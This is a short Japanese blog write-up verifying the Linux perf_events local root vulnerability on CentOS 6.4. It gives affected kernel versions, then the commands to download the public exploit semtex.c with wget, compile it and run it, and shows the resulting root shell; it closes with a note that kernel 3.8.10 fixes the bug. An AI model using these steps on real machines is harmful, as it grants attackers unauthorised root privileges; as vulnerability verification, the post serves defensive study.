スポンサーリンク

このドキュメントの内容は、以下の通りです。

はじめに


Linux には、perf のバグを利用した、権限昇格される脆弱性があります。
CentOS 6.4, kernel 2.6.32 で確認しました。

検証環境


CentOS release 6.4 (Final)
uname -a
Linux u1.local 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64 x86_64 x86_64 GNU/Linux

影響範囲


  • 影響を受けるには、3.8.9までのLinuxカーネルです。
    • 2.6.32
    • 2.6.37 - 3.8.9
  • RHEL 6 が影響を受けます。
  • RHEL 5 には、影響しません。

環境構築


ビルド環境には、 gcc が必要です。
sudo yum install gcc

権限昇格コードの入手とコンパイル


wget http://packetstorm.foofus.com/1305-exploits/semtex.c
gcc -O2 semtex.c

実験


[kaworu@u1 Linux_PERF_EVENTS_Local_Root]$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),500(kaworu) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-sh-4.1#

対策


3.8.10 はすでに修正されています。

2.x は...?

スポンサーリンク
スポンサーリンク
 
いつもシェア、ありがとうございます!


もっと情報を探しませんか?

関連記事

最近の記事

人気のページ

スポンサーリンク
 

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12

サイト

Vim入門

C言語入門

C++入門

JavaScript/Node.js入門

Python入門

FreeBSD入門

Ubuntu入門

セキュリティ入門

パソコン自作入門

ブログ

トップ


プライバシーポリシー